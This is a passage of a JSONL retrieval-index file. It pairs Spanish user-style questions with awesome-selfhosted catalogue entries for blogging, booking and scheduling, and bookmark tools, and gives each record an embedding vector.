-0.03598, 0.02041, 0.00014, 0.02828, -0.02806, 0.00828, 0.02359, -0.04685, -0.03764, -0.02211, -0.14186, -0.09264, -0.05057, -0.00965, 0.03784, -0.00749, -0.09025, 0.00096, 0.04516, -0.05975, -0.02797, -0.02886, -0.01494, -0.02099, 0.06457, 0.01002, -0.0001, -0.00471, -0.01392, -0.04038, -0.00376, -0.04071, 0.03329, -0.07132, -0.03282, -0.02869, -0.08748, -0.043, -0.0999, 0.04578, -0.04052, 0.01518, -0.08767, -0.04537, -0.07194, 0.04767, -0.05541, 0.04997, -0.05456, 0.04363, 0.0457, -0.0282, -0.00806, -0.02107, -0.06165, 0.06189, -0.00813, 0.03771, -0.04931, 0.09556, 0.00601, -0.09837, 0.06802, -0.0165, -0.00496, -0.08335, 0.02347, 0.01756, 0.04401, -0.04146, -0.09609, 0.05975, -0.02191, -0.03139, 0.09357, 0.04005, -0.04045, 0.09519, -0.02526, -0.07225, -0.07326, -0.00704, 0.04669, 0.02999, 0.03188, -0.069, 0.05245, -0.02973, -0.05578, -0.04834, -0.01114, 0.00136, -0.09356, -0.02667, 0.02545, -0.02469, -0.01016, 0.01586, 0.02886, -0.02518, 0.0167, -0.02359, 0.00247, -0.00417, 0.03636, -0.01962, 0.00745, -0.06375, 0.06479, 0.04137, -0.02966, 0.02412, 0.02698, 0.02023, -0.00374, 0.03419, -0.01003, 0.03274, -0.06305, -0.08237, -0.06726, -0.02908, 0.00449, -0.03169, 0.00855, 0.03194, -0.00709, 0.02513, 0.0178, 0.04302, 0.00536, -0.01826, 0.02932, -0.01299, -0.0537, -0.00352, -0.03594, -0.09133, -0.04691, -0.02034, 0.01201, -0.00273, -0.00416, 0.01666]} -{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: HTMLy β€” Databaseless PHP blogging platform. A flat-file CMS that allows you to create a fast, secure, and powerful website or blog in seconds [GPL-2.0, PHP]. Known β€” Collaborative social publishing platform [Apache-2.0, PHP]. Mataroa β€” Naked blogging platform for minimalists [MIT, Python]. PluXml β€” XML-based blog/CMS platform [GPL-3.0, PHP]. Serendipity β€” Serendipity (s9y) is a highly extensible and customizable PHP blog engine using Smarty templating [BSD-3-Clause, PHP]. WriteFreely β€” Writing software for starting a minimalist, federated blog β€” or an entire community [AGPL-3.0, Go].", "indexar": "con que programa puedo gestionar mi comunidad y publicar contenido colaborativo?", "v": [0.1014, 0.21725, -0.13781, -0.21895, 0.1076, -0.16796, 0.03449, 0.0557, -0.11936, -0.17158, -0.01279, -0.07271, 0.05311, -0.01009, -0.00418, 0.05421, 0.14691, -0.1126, -0.01855, 0.0529, 0.04994, 0.04148, 0.00467, -0.01793, 0.10962, -0.10878, 0.04673, -0.09257, 0.09231, 0.01713, 0.04087, 0.01621, 0.01248, -0.02918, -0.00045, -0.00482, 0.03457, 0.01977, -0.00179, -0.03628, -0.05929, 0.00637, -0.10152, -0.02652, 0.03345, 0.02962, 0.01415, -0.13024, -0.0367, 0.01637, -0.09902, -0.054, -0.04365, 0.02006, 0.00478, 0.01257, 0.08804, -0.1756, -0.05834, -0.04373, -0.03631, 0.02594, -0.00917, -0.05677, -0.018, -0.01532, 0.0522, 0.05016, -0.09986, 0.23763, 0.0045, -0.00329, 0.03832, -0.09587, -0.03361, 0.01636, -0.00841, -0.02359, 0.00471, -0.06149, 0.00171, 0.00049, 0.16828, 0.07821, -0.01046, -0.07696, 0.01283, -0.16497, 0.04594, 0.01469, 0.01644, -0.01953, -0.03058, -0.06539, 0.02227, -0.02703, 0.13857, 0.01522, 0.02565, 0.05022, -0.01105, -0.0126, -0.06664, -0.00072, 0.0001, 0.06867, -0.02791, -0.02382, 9e-05, 0.06296, 0.10404, -0.02752, 0.03426, -0.10121, -0.05461, 0.0341, -0.03586, 0.00844, 0.08964, -0.04492, -0.07141, -0.0196, 0.00373, -0.03203, 0.19144, 0.04233, 0.0165, 0.07274, -0.00826, 0.01137, -0.10667, 0.05724, 0.03929, 0.01639, -0.04456, 0.02634, -0.03799, -0.0001, -0.08576, -0.1059, 0.00712, 0.01069, 0.05571, -0.05883, 0.01313, -0.08158, 0.01831, -0.0893, 0.0296, 0.06886, 0.0289, -0.04014, -0.07478, -0.04548, -0.05104, -0.02229, 0.07264, -0.03153, -0.04126, -0.02093, -0.03561, 0.01034, -0.01761, -0.03012, 0.03075, 0.00555, -0.02277, -0.02066, 0.07061, 0.02177, -0.05856, 0.06339, 0.06064, -0.05095, 0.02562, -0.061, -0.08896, -0.12986, -0.00462, -0.01364, -0.0888, 0.01446, 0.00079, 0.04114, -0.00022, 0.01582, -0.05053, 0.08064, 0.00811, -0.00294, 0.04031, 0.00112, 0.02562, 0.00056, 0.02961, -0.09037, -0.02417, -0.06031, 0.04105, -0.0017, -0.0446, 0.07458, 0.03575, 0.0097, -0.04872, 0.06227, -0.04149, 0.06285, 0.04916, 0.08421, 0.03227, -0.00607, 0.03114, 0.01341, -0.05735, -0.00594, 0.02331, -0.02201, -0.01378, 0.03637, 0.0261, 0.00989, 0.07671, -0.0543, 0.04956, -0.05391, 0.06582, 0.03095, 0.03854, 0.02344, -0.0425, -0.02844, -0.04837, -0.05391, 0.04191, -0.01354, 0.03013, -0.02302, -0.05134, -0.07035, 0.02953, 0.0342, 0.03765, -0.04429, -0.03486, -0.01687, -0.08975, 0.03418, -0.00599, -0.03887, -0.03115, 0.03247, 0.06097, -0.08463, 0.06944, 0.01103]} -{"tipo": "pregunta", "herramienta": "Booking and Scheduling", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Booking and Scheduling", "tema": "booking and scheduling", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Booking and Scheduling: Alf.io β€” Ticket reservation system [GPL-3.0, Java]. Cal.diy β€” Online appointment scheduling system [MIT, Nodejs]. Easy!Appointments β€” Allows your customers to book appointments with you via the web [GPL-3.0, PHP]. Hi.Events β€” Event management and ticketing platform for conferences, concerts, and more. Offering customizable event pages and embeddable ticket widgets [AGPL-3.0, Docker]. LibreBooking β€” Resource scheduling solution offering a flexible, mobile-friendly, and extensible interface for organizations to manage resource reservations [GPL-3.0, PHP/Docker]. QloApps β€” Customizable and intuitive web-based hotel reservation system and a booking engine [OSL-3.0, PHP/Nodejs]. Rallly β€” Create polls to vote on dates and times (alternative to Doodle) [AGPL-3.0, Nodejs/Docker]. Seatsurfing β€” Webbased app to book seats, desks and rooms for offices [GPL-3.0, Docker].", "indexar": "ΒΏQuΓ© programa sirve para gestionar reservas de eventos y conferencias?", "v": [0.0392, 0.06965, 0.01289, -0.28961, 0.10174, -0.08821, 0.03096, -0.05105, -0.04723, -0.16494, -0.10986, -0.06958, 0.00702, -0.05383, 0.02699, 0.15619, 0.13076, 0.0362, 0.1149, 0.08401, -0.02481, 0.07403, 0.03006, -0.03645, -0.08094, -0.07927, 0.12186, -0.06582, -0.00383, -0.02168, 0.05609, -0.02702, 0.00642, -0.10905, 0.11495, 0.08652, 0.03646, 0.08056, -0.09039, -0.03318, -0.07249, -0.05622, -0.01036, -0.00134, 0.11543, -0.10488, -0.03728, -0.00875, -0.0365, 0.00192, -0.01689, 0.05866, 0.00874, -0.00964, 0.05992, -0.04748, -0.1593, -0.12811, -0.02315, 0.01794, -0.02824, 0.00215, 0.00763, 0.038, 0.10892, -0.02081, 0.00782, -0.00075, -0.02151, 0.04409, -0.22005, -0.08257, 0.07066, 0.05154, 0.0617, 0.0066, 0.03071, 0.06504, -0.03477, -0.01656, -0.07961, 0.07168, 0.01386, 0.0903, -0.07974, 0.0321, 0.02979, -0.02827, -0.09782, 0.03055, 0.0067, 0.05084, 0.04843, -0.03358, -0.02998, -0.11856, 0.11687, 0.09256, -0.03656, 0.0326, 0.03177, 0.0522, -0.02084, 0.08331, -0.08106, 0.12379, 0.08633, -0.09536, -0.03007, 0.02767, -0.04026, -0.00308, -0.08737, -0.00063, -0.00045, 0.07956, 0.08965, -0.05772, 0.09292, 0.03845, -0.06949, 0.0049, -0.00116, -0.00448, 0.04827, 0.05056, -0.07042, 0.13744, -0.00683, 0.03936, 0.00835, -0.06767, -0.03313, -0.02236, 0.0445, -0.07608, 0.0342, -0.01563, 0.0342, -0.06513, -0.04183, 0.08825, 0.01396, -0.00923, 0.09581, 0.03035, 0.06183, -0.02782, 0.06803, 0.05299, 0.07446, -0.05569, 0.03563, 0.08136, -0.05624, -0.08111, -0.08334, -0.07609, -0.08173, 0.07042, -0.06159, -0.01219, 0.02287, -0.04534, 0.04742, -0.03509, 0.02642, 0.0294, 0.02853, 0.10039, 8e-05, 0.07916, 0.05449, -0.06943, -0.02541, -0.02515, -0.0244, -0.11451, 0.0236, -0.06387, -0.03952, -0.0276, -0.01811, 0.03671, 0.05824, 0.00338, 0.01269, 0.09926, -0.01293, 0.0076, -0.00885, 0.05471, 0.02853, -0.06526, -0.01538, -0.06869, -0.08029, -0.03898, 0.0502, -0.01026, -0.01277, 0.01678, 0.00922, 0.03793, 0.01359, 0.08491, -0.03514, 0.03401, 0.06285, 0.04166, -0.04874, 0.05077, 0.05161, -0.02538, -0.07636, -0.05898, -0.01402, 0.07265, 0.05218, 0.00098, 0.03181, -0.04355, 0.00295, 0.03996, 0.07956, -0.07008, 0.01999, -0.02648, 0.01671, 0.035, 0.0288, 0.00478, 0.00214, 0.06238, 0.03605, -0.00731, 0.03158, 0.00872, 0.03343, -0.03766, -0.04541, 0.0275, 0.02059, -0.06429, -0.00648, 0.02467, -0.07584, 0.05762, -0.00014, -0.00213, -0.01973, 0.0039, 0.02915, -0.01157, 0.03714, 0.03492]} -{"tipo": "pregunta", "herramienta": "Booking and Scheduling", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Booking and Scheduling", "tema": "booking and scheduling", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Booking and Scheduling: Alf.io β€” Ticket reservation system [GPL-3.0, Java]. Cal.diy β€” Online appointment scheduling system [MIT, Nodejs]. Easy!Appointments β€” Allows your customers to book appointments with you via the web [GPL-3.0, PHP]. Hi.Events β€” Event management and ticketing platform for conferences, concerts, and more. Offering customizable event pages and embeddable ticket widgets [AGPL-3.0, Docker]. LibreBooking β€” Resource scheduling solution offering a flexible, mobile-friendly, and extensible interface for organizations to manage resource reservations [GPL-3.0, PHP/Docker]. QloApps β€” Customizable and intuitive web-based hotel reservation system and a booking engine [OSL-3.0, PHP/Nodejs]. Rallly β€” Create polls to vote on dates and times (alternative to Doodle) [AGPL-3.0, Nodejs/Docker]. Seatsurfing β€” Webbased app to book seats, desks and rooms for offices [GPL-3.0, Docker].", "indexar": "Con quΓ© puedo montar un sistema de citas online para mi negocio?", "v": [-0.07558, 0.11056, -0.17045, -0.07565, -0.02124, -0.1193, -0.05612, -0.00525, -0.29851, -0.11933, -0.00119, -0.14682, 0.04801, -0.03437, 0.05996, 0.06556, 0.09067, -0.04516, 0.09857, -0.09995, 0.00407, -0.10989, 0.01884, -0.06426, -0.02958, -0.01413, 0.06488, -0.10584, -0.11379, 0.14659, -0.01676, 0.04367, 0.0957, 0.06496, -0.02616, -0.09247, 0.02983, 0.06373, 0.06997, -0.13363, 0.08782, 0.01239, -0.00725, 0.04989, 0.04534, -0.07068, -0.02019, -0.09349, -0.085, -0.00949, 0.00232, -0.09588, -0.13409, -0.07635, 0.02752, -0.06658, -0.03304, 0.04519, 0.09742, 0.01634, 0.01677, -0.0206, -0.0286, 0.02685, -0.00306, -0.01544, 0.0274, 0.00926, -0.08557, 0.05498, -0.07169, -0.03352, 0.01021, -0.09051, 0.05773, 0.02931, 0.12824, 0.0092, 0.03806, -0.02027, 0.03433, 0.04365, -0.08229, 0.16662, 0.03431, -0.00215, -0.0801, -0.00196, 0.08097, 0.08708, 0.03457, 0.07468, 0.03704, -0.00454, 0.03573, -0.10358, -0.00836, 0.08459, -0.07876, 0.05814, -0.07688, 0.08841, -0.11514, 0.06137, -0.10874, -0.06086, -0.01001, -0.02096, 0.03013, -0.02804, -0.0333, -0.0284, -0.06899, 0.01049, -0.04978, -0.04471, 0.04473, 0.07953, -0.07891, 0.02037, -0.03661, 0.10675, 0.07615, -0.002, 0.05936, 0.01996, 0.00425, 0.11968, -0.02158, -0.05053, 0.04245, -0.03057, -0.03181, -0.05559, 0.07356, 0.00828, -0.01707, -0.00109, -0.03292, -0.03345, -0.02521, -0.04558, -0.12175, -0.01959, 0.07136, -0.01835, 0.08615, -0.11988, -0.02915, -0.03673, 0.02876, 0.14127, -0.00728, -0.0323, -0.0396, -0.00148, 0.05547, -0.00075, 0.05587, 0.02772, 0.03585, 0.04789, 0.04663, -0.0255, -0.02822, 0.02278, -0.07981, 0.00652, 0.04852, 0.04405, -0.03854, 0.08285, 0.06467, -0.12174, 0.06785, 0.06855, -0.07618, -0.03321, 0.02396, -0.02664, -0.05371, -0.01351, 0.05248, 0.04439, -0.05288, 0.03582, 0.03719, 0.0166, -0.03931, 0.05971, 0.01477, -0.02183, -0.06933, 0.00758, 0.0566, -0.03364, 0.0055, -0.01961, 0.03124, -0.0239, -0.08607, -0.07749, 0.03516, 0.00747, 0.01136, 0.01909, 0.04824, 0.00698, 0.08744, 0.07679, 0.00546, -0.01414, 0.01739, -0.05575, -0.02973, 0.0224, -0.02238, -0.00313, -0.02463, -0.02245, 0.00864, -0.04611, -0.01572, 0.05046, 0.01425, 0.03332, -0.02242, -0.01559, -0.01017, -0.03211, -0.01946, -0.11771, 0.00342, -0.01285, -0.01796, -0.05763, 0.0162, 0.04691, -0.07697, 0.01994, 0.05384, 0.03096, 0.03245, -0.02778, -0.00223, -0.016, -0.06547, -0.01746, -0.04611, -0.0883, -0.09621, -0.01954, -0.05649, -0.04308, -0.02123, 0.04154]} -{"tipo": "pregunta", "herramienta": "Booking and Scheduling", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Booking and Scheduling", "tema": "booking and scheduling", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Booking and Scheduling: Alf.io β€” Ticket reservation system [GPL-3.0, Java]. Cal.diy β€” Online appointment scheduling system [MIT, Nodejs]. Easy!Appointments β€” Allows your customers to book appointments with you via the web [GPL-3.0, PHP]. Hi.Events β€” Event management and ticketing platform for conferences, concerts, and more. Offering customizable event pages and embeddable ticket widgets [AGPL-3.0, Docker]. LibreBooking β€” Resource scheduling solution offering a flexible, mobile-friendly, and extensible interface for organizations to manage resource reservations [GPL-3.0, PHP/Docker]. QloApps β€” Customizable and intuitive web-based hotel reservation system and a booking engine [OSL-3.0, PHP/Nodejs]. Rallly β€” Create polls to vote on dates and times (alternative to Doodle) [AGPL-3.0, Nodejs/Docker]. Seatsurfing β€” Webbased app to book seats, desks and rooms for offices [GPL-3.0, Docker].", "indexar": "ΒΏHay alguna alternativa libre a Doodle para votar en fechas y horas?", "v": [-0.07462, 0.13467, -0.09801, 0.1048, -0.14259, 0.01899, 0.11379, -0.07331, 0.00996, -0.13948, -0.03859, -0.32572, 0.10462, 0.01876, 0.02773, -0.05608, 0.1315, -0.11986, 0.06919, -0.01464, -0.08262, -0.03082, -0.06147, 0.01742, -0.00852, -0.10735, 0.02087, 0.13537, -0.11803, -0.0068, 0.04007, -0.10932, 0.02471, -0.02614, 0.10484, 0.02175, 0.13819, 0.15004, 0.0456, -0.0641, 0.06313, 0.07423, -0.01394, 0.04022, -0.01689, -0.01713, -0.12441, 0.1141, -0.00301, -0.05533, -0.00855, 0.03086, 0.01013, 0.05232, 0.08655, 0.05439, -0.00344, -0.07501, -0.14476, -0.08893, -0.05, 0.05103, 0.14858, -0.02703, 0.03727, 0.08244, -0.05252, 0.0077, 0.07077, 0.16135, -0.08397, -0.05401, 0.02033, 0.05507, -0.10135, -0.00439, -0.00979, -0.04858, -0.03057, 0.05848, 0.07082, -0.0628, 0.01645, 0.04483, -0.00071, 0.06066, 0.0744, -0.09719, -0.05189, -0.02081, 0.1109, 0.08896, 0.09773, 0.11181, -0.02953, -0.07844, -0.01142, 0.04771, -0.04041, 0.03019, 0.02293, -0.01677, 0.03673, 0.04186, -0.04204, -0.0085, -0.00753, 0.08457, 0.01606, 0.0473, -0.05259, 0.13276, -0.13673, -0.04729, 0.03549, -0.03707, 0.0304, 0.0131, -0.02976, 0.0154, 0.06019, 0.0385, -0.03629, -0.09153, 0.02391, 0.02765, 0.05849, 0.00105, -0.08484, 0.02979, 0.02402, 0.02023, -0.05187, -0.04183, -0.09244, 0.03181, 0.0138, 0.04157, -0.0213, 0.02066, -0.01788, 0.07835, 0.05877, -0.00739, 0.05536, -3e-05, -0.06906, -0.03974, -0.02313, -0.06752, -0.0385, -0.09085, 0.0466, 0.077, -0.01029, -0.02964, -7e-05, 0.02412, -0.06123, 0.05271, -0.03014, -0.02469, -0.04654, -0.0419, 0.03116, 0.00642, -0.02172, -0.02982, -0.12067, 0.08636, 0.06541, 0.10276, 0.00518, -0.01219, 0.0248, -0.05227, 0.03178, 0.01715, 0.01699, -0.07248, 0.0959, 0.02993, 0.02344, 0.02581, 0.01546, -0.05058, 0.0449, 0.02941, -0.0117, -0.03996, -0.05024, 0.02013, 0.02115, -0.01878, 0.00827, 0.01931, 0.08286, -0.01908, -0.02751, 0.04437, -0.07928, -0.01039, -0.02798, 0.02959, -0.01429, 0.03977, -0.06485, 0.09373, 0.05229, -4e-05, 0.00746, 0.04266, 0.02177, 0.01645, -0.05596, 0.01707, 0.07378, -0.01191, -0.03611, -0.05085, -0.01395, 0.02382, 0.03833, 0.01835, -0.01479, 0.00893, 0.0832, 0.02335, 0.02925, 0.01063, 0.04809, 0.02424, 0.04201, 0.00784, -0.01267, -0.06324, 0.04892, 0.02147, 0.00671, -0.01848, 0.06388, -0.00019, -0.04131, -0.03599, -0.04172, 0.02902, -0.03724, -0.004, -0.03011, -0.0304, -0.05733, 0.00945, -0.00756, -0.03096, 0.01152, 0.01024]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: Betula β€” Single-user federated bookmark manager with Fediverse support and archives [AGPL-3.0, Go]. Buku β€” Powerful bookmark manager and a personal textual mini-web [GPL-3.0, Python/deb]. Digibunch β€” Create bunches of links to share with your learners or colleagues [AGPL-3.0, Nodejs/PHP]. Espial β€” An open-source, web-based bookmarking server [AGPL-3.0, Haskell]. Faved β€” Handcrafted bookmark manager combining powerful tagging, instant search, and a clean, distraction-free interface. Built for large collections and advanced workflows, optimized for efficiency and ease-of-use [MIT, Docker]. Firefox Account Server β€” Host your own Firefox accounts server [MPL-2.0, Nodejs/Java]. Karakeep β€” Bookmark-everything app with a touch of AI for the data hoarders out there [AGPL-3.0, Docker]. LinkAce β€” Bookmark archive with automatic backups to the Internet Archive, link monitoring, and a full REST API. Installation is done via Docker, or as a simple PHP application [GPL-3.0, Docker/PHP].", "indexar": "que gestor de bookmarks sirve para tener mi propia instancia federada?", "v": [-0.04715, 0.01066, -0.22912, -0.18785, 0.13841, 0.04162, -0.00435, -0.06802, -0.03103, -0.22049, -0.01679, 0.10602, -0.05531, -0.06672, 0.13763, 0.07419, 0.15809, -0.1451, 0.13744, -0.05943, 0.07456, 0.10022, 0.10428, 0.01046, -0.11239, -0.138, 0.0782, -0.08287, -0.04071, 0.01151, 0.04528, 0.02105, -0.00954, -0.12239, -0.05987, 0.01739, -0.00836, 0.02158, -0.05807, 0.00186, 0.02806, 0.11857, -0.05694, -0.03446, -0.00257, -0.04106, -0.00996, -0.04851, 0.00073, 0.10506, -0.08673, -0.11889, -0.00556, 0.05169, -0.17525, 0.01381, 0.03998, -0.05637, -0.02752, 0.00869, -0.14736, -0.03699, -0.0219, 0.03347, 0.06507, -0.11015, 0.00059, -0.00125, -0.01678, 0.00139, -0.03648, -0.00516, 0.01019, -0.0271, -0.00814, 0.12567, 0.08729, 0.05782, 0.13065, 0.05906, -0.01673, -0.1162, -0.12132, 0.02705, 0.00948, 0.00059, 0.00866, -0.07028, 0.083, -0.00472, -0.05755, -0.03647, -0.06549, 0.02087, -0.11196, -0.15172, 0.05407, 0.06651, 0.04957, 0.01161, 0.05145, 1e-05, 0.03069, 0.14748, 0.00786, 0.04078, 0.00936, 0.0339, 0.06612, 0.07341, 0.09396, 0.03964, -0.01352, 0.01857, 0.07553, 0.04384, -0.07845, -0.06741, 0.12004, -0.03513, -0.00317, -0.13486, -0.01289, -0.04129, -0.00729, 0.10857, -0.04292, 0.10445, 0.07898, 0.03068, 0.01298, 0.03404, -0.03353, 0.03113, -0.08019, 0.06222, -0.07761, -0.04761, 0.05337, -0.04371, -0.03656, 0.04525, 0.00774, -0.07777, 0.0092, 0.01039, 0.066, -0.06108, 0.01015, -0.0001, 0.00282, -0.0705, 0.00261, 0.05004, 0.0149, 0.06189, -0.01723, -0.011, 0.03889, 0.01731, -0.07158, -0.01135, -0.01598, 0.02468, -0.02726, 0.00259, -0.03337, 0.05034, 0.06887, 0.09016, -0.04055, 0.07402, -0.01701, -0.10492, 0.04314, -0.0533, -0.03616, -0.00967, 0.05519, 0.04174, 0.00057, -0.01676, -0.0333, 0.0024, -0.03102, -0.07777, 0.00103, 0.05122, 0.00523, 0.0832, 0.06097, -0.01515, 0.01033, 0.00798, 0.05406, -0.06561, -0.04562, -0.04835, -0.01373, -0.00852, 0.02833, -0.03572, -0.01499, 0.05828, 0.00772, -0.00827, -0.06473, 0.00778, 0.00428, 0.00101, 0.06212, 0.02565, 0.04912, 0.0421, 0.00676, -0.02733, 0.06398, 0.00301, 0.01701, -0.06694, 0.04713, -0.00697, 0.05657, -0.02349, 0.03387, 0.00409, -0.02089, 0.01239, 0.05604, 0.00411, 0.00373, -0.00649, -0.01395, 0.02794, 0.0273, -0.02834, 0.02994, 0.01447, -0.02494, -0.01222, -0.00607, 0.06299, -0.03507, -0.03128, -0.01842, -0.05093, 0.01467, 0.03201, -0.01313, -0.02468, -0.00307, -0.0255, 0.06967, -0.01445, 0.01035, -0.03602]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: Betula β€” Single-user federated bookmark manager with Fediverse support and archives [AGPL-3.0, Go]. Buku β€” Powerful bookmark manager and a personal textual mini-web [GPL-3.0, Python/deb]. Digibunch β€” Create bunches of links to share with your learners or colleagues [AGPL-3.0, Nodejs/PHP]. Espial β€” An open-source, web-based bookmarking server [AGPL-3.0, Haskell]. Faved β€” Handcrafted bookmark manager combining powerful tagging, instant search, and a clean, distraction-free interface. Built for large collections and advanced workflows, optimized for efficiency and ease-of-use [MIT, Docker]. Firefox Account Server β€” Host your own Firefox accounts server [MPL-2.0, Nodejs/Java]. Karakeep β€” Bookmark-everything app with a touch of AI for the data hoarders out there [AGPL-3.0, Docker]. LinkAce β€” Bookmark archive with automatic backups to the Internet Archive, link monitoring, and a full REST API. Installation is done via Docker, or as a simple PHP application [GPL-3.0, Docker/PHP].", "indexar": "con que programa puedo organizar y compartir enlaces sin depender de servicios externos?", "v": [0.16376, 0.24465, -0.15574, -0.18688, 0.0615, -0.06644, 0.02546, -0.06221, -0.14329, -0.14967, -0.08946, -0.05959, -0.0396, -0.22353, 0.05249, 0.05204, 0.15393, -0.11085, 0.05248, 0.02144, -0.04581, 0.03839, -0.04876, 0.0208, -0.01174, -0.0949, 0.11014, -0.02669, -0.06379, 0.00655, -0.04135, -0.04417, 0.01875, -0.08023, 0.03072, 0.02115, 0.08805, 0.1031, 0.02843, -0.10218, -0.10223, 0.0048, -0.03429, 0.04485, -0.01013, 0.03753, -0.06138, -0.00143, -0.00387, -0.02853, -0.03188, -0.03616, -0.10937, -0.0515, -0.06948, -0.12039, 0.00616, -0.13281, -0.07695, 0.012, 0.00433, 0.07741, 0.02206, 0.04837, 0.0986, 0.03278, -0.01088, 0.06721, -0.07448, 0.06469, -0.10934, -0.02494, 0.03152, -0.02714, -0.00837, 0.0973, 0.0395, 0.00346, -0.00147, 0.03031, -0.06178, 0.07622, 0.09588, 0.10757, -0.03801, -0.04981, -0.02145, 0.01034, 0.01897, -0.04887, 0.03186, 0.09704, -0.01423, 0.01586, -0.12282, -0.02562, 0.08577, 0.07193, 0.08501, 0.05201, 0.07928, 0.01688, 0.01292, 0.12981, -0.0202, 0.03201, 0.09963, 0.00453, 0.00126, 0.05286, 0.01444, 0.01065, -0.00327, -0.07603, -0.07817, -0.04909, -0.02741, 0.01959, 0.02146, -0.01192, -0.05275, -0.02547, -0.03289, 0.05914, 0.0213, -0.03069, 0.04722, 0.14412, -0.01383, 0.03831, 0.01038, 0.01837, -0.01504, -0.00668, -0.01774, -0.07154, 0.02671, -0.04048, 0.0714, -0.07771, -0.04122, 0.00172, 0.01745, -0.07241, 0.00888, -0.02405, 0.02744, -0.04129, -0.05551, -0.04457, -0.01588, 0.04491, -0.09472, 0.01763, -0.05925, -0.04324, -0.05966, -0.04077, -0.01152, 0.05519, -0.06885, 0.01829, 0.01864, -0.01379, 0.07224, 0.01745, 0.05877, 0.00902, 0.02014, 0.08795, -0.08476, 0.11016, -0.00613, -0.11437, -0.04289, -0.02708, -0.05707, -0.1123, 0.04671, 0.02681, -0.04712, 0.02928, -0.03536, 0.05436, -0.04865, -0.0345, -0.02406, 0.0362, -0.00476, -0.05868, 0.03195, -0.04319, -0.03356, 0.02851, 0.07281, -0.05777, -0.07893, -0.05722, 0.0385, -0.04213, -0.06784, -0.05499, 0.03563, 0.00498, -0.00704, 0.0674, -0.01019, 0.04895, 0.03684, 0.1232, 0.05194, -0.05633, 0.06918, -0.04701, -0.09265, 0.00479, 0.02101, -0.01403, 0.07909, 0.05114, -0.01125, -0.01864, 0.04076, -0.02659, 0.02843, -0.05532, 0.05394, 0.05474, 0.05145, 0.06188, -0.05181, -0.03864, -0.02196, -0.03733, 0.02432, -0.05154, -0.0175, -0.04891, -0.01109, -0.02362, 0.00984, 0.03789, -0.02075, -0.07394, -0.03809, -0.00492, -0.0752, -0.01024, 0.01537, -0.04082, -0.00615, 0.04062, 0.07483, -0.03777, 0.00806, 0.0413]} -{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: Betula β€” Single-user federated bookmark manager with Fediverse support and archives [AGPL-3.0, Go]. Buku β€” Powerful bookmark manager and a personal textual mini-web [GPL-3.0, Python/deb]. Digibunch β€” Create bunches of links to share with your learners or colleagues [AGPL-3.0, Nodejs/PHP]. Espial β€” An open-source, web-based bookmarking server [AGPL-3.0, Haskell]. Faved β€” Handcrafted bookmark manager combining powerful tagging, instant search, and a clean, distraction-free interface. Built for large collections and advanced workflows, optimized for efficiency and ease-of-use [MIT, Docker]. Firefox Account Server β€” Host your own Firefox accounts server [MPL-2.0, Nodejs/Java]. Karakeep β€” Bookmark-everything app with a touch of AI for the data hoarders out there [AGPL-3.0, Docker]. LinkAce β€” Bookmark archive with automatic backups to the Internet Archive, link monitoring, and a full REST API. Installation is done via Docker, or as a simple PHP application [GPL-3.0, Docker/PHP].", "indexar": "busco una herramienta open source para crear grupos de links y compartirla con mis compaΓ±eros", "v": [0.04014, 0.08131, -0.16879, -0.18734, -0.10437, -0.20909, -0.06923, 0.04828, -0.01535, -0.1944, -0.11547, -0.00614, -0.0319, -0.00145, 0.09653, 0.005, 0.02702, -0.02186, 0.02698, -0.02824, -0.00571, 0.03807, -0.05993, -0.01339, -0.0341, -0.18706, -0.02273, -0.0993, -0.05278, 0.14433, 0.01164, 0.02293, -0.06605, -0.05748, -0.01618, -0.14545, 0.02061, 0.08269, 0.0255, 0.00848, -0.11851, 0.07154, -0.18144, -0.01325, 0.01438, 0.01541, -0.09796, 0.03104, -0.03668, 0.11311, -0.05654, -0.06627, -0.15563, -0.05336, -0.07981, -0.10664, 0.17799, -0.16597, 0.02057, 5e-05, -0.10176, 0.04443, -0.08632, -0.07568, 0.00451, -0.02304, 0.03445, -0.04481, -0.12267, 0.1281, -0.03488, -0.06467, -0.02672, -0.06081, 0.00785, 0.05502, -0.06796, 0.06841, 0.00131, 0.06637, 0.07555, -0.01632, 0.0779, -0.02233, -0.01098, -0.07556, 0.15656, 0.04006, -0.04612, -0.04, 0.02105, 0.07765, -0.0504, 0.01388, 0.02657, -0.01226, 0.02806, 0.01495, 0.00691, 0.01743, 0.08871, -0.05411, -0.05998, 0.03667, -0.00759, 0.00253, -0.09508, 0.01683, -0.08348, 0.04282, 0.09467, -0.03401, 0.12043, 0.02359, 0.0573, -0.02156, -0.03209, 0.05144, 0.01615, -0.03153, 0.02169, -0.02311, -0.11376, 0.04098, 0.01433, 0.00867, 0.04394, 0.11986, -0.01267, 0.01222, -0.07907, -0.03281, -0.04586, 0.05259, -0.00912, -0.00303, 0.05797, 0.00202, 0.05553, 